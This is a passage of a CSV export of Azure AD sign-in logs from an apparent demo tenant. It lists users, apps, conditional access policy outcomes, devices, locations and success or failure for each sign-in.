'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,09/04/2020 11:56,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",e4ad56a4-20cd-4ec9-8d5b-ecb8630a1000,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,e4ad56a4-20cd-4ec9-8d5b-ecb8630a1000,SigninLogs,Sucess,50.6406517,5.572050095
+1496,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,21:17.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,8dd984e0-ffe1-44ef-bf6b-97dec1c9c8c7,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 10:21,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",e5856cfd-3e84-4d67-b30b-c1cec7f20e00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,e5856cfd-3e84-4d67-b30b-c1cec7f20e00,SigninLogs,Sucess,36.6404686,-78.26995087
+1497,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,21:21.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,d3dc6eea-2e84-4ae9-ae61-df87573d1ca9,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 12:21,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",0184cc6e-10a2-4578-80c3-44b6e5571000,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,0184cc6e-10a2-4578-80c3-44b6e5571000,SigninLogs,Sucess,36.6404686,-78.26995087
+1498,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,24:36.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,53338961-4beb-424c-ad88-75cd0b7befc0,Microsoft.aadiam,Microsoft.aadiam,,PC Admin,4,US,App Service,7ab7862c-4c57-491e-8a45-d52a7e023983,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 12:24,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 81.0.416'}",e9069a8f-c043-4e23-9435-a5568e711100,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -77.4198989868164, 'latitude': 38.47222137451172}, 'state': 'Virginia', 'city': 'Stafford'}",none,none,none,none,[],{'errorCode': 0},PC Admin,95289cbf-4ab6-46f3-804b-c9a6f2ef1227,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,e9069a8f-c043-4e23-9435-a5568e711100,SigninLogs,Sucess,38.47222137,-77.41989899
+1499,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,21:12.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,37f307ba-3566-4c52-8c62-9021b7516ae2,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 10:21,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",88cadf22-86a5-4f87-805f-6b28e01f0f00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,88cadf22-86a5-4f87-805f-6b28e01f0f00,SigninLogs,Sucess,36.6404686,-78.26995087
+1500,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,24:16.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,3b8be8a8-ef28-453d-b76d-658753bb1e07,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",success,09/04/2020 12:24,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",5949abe0-9b87-40bf-991e-6df705131100,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,5949abe0-9b87-40bf-991e-6df705131100,SigninLogs,Sucess,50.6406517,5.572050095
+1501,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,32:45.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,b78587d2-8d16-4629-9a64-f645937955b4,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BE,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,09/04/2020 09:32,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",3ef67224-5589-46eb-8d41-921518530e00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,3ef67224-5589-46eb-8d41-921518530e00,SigninLogs,Sucess,50.6406517,5.572050095
+1502,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,24:23.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,16000,None,Other,0,53338961-4beb-424c-ad88-75cd0b7befc0,Microsoft.aadiam,Microsoft.aadiam,,6953ad4f-7384-4478-a2af-06fb8fe1a5c5,4,US,App Service,7ab7862c-4c57-491e-8a45-d52a7e023983,Browser,[],notApplied,09/04/2020 12:24,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 81.0.416'}",7399a376-1fc8-4418-84d7-277d74476300,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -77.4198989868164, 'latitude': 38.47222137451172}, 'state': 'Virginia', 'city': 'Stafford'}",none,none,none,none,[],"{'errorCode': 16000, 'failureReason': 'Other'}",6953ad4f-7384-4478-a2af-06fb8fe1a5c5,6953ad4f-7384-4478-a2af-06fb8fe1a5c5,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,7399a376-1fc8-4418-84d7-277d74476300,SigninLogs,Failed,38.47222137,-77.41989899
+1503,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,21:05.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,3b8be8a8-ef28-453d-b76d-658753bb1e07,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",success,09/04/2020 11:21,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",724252ea-eeaa-47d5-808a-7afe503c1000,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,724252ea-eeaa-47d5-808a-7afe503c1000,SigninLogs,Sucess,50.6406517,5.572050095
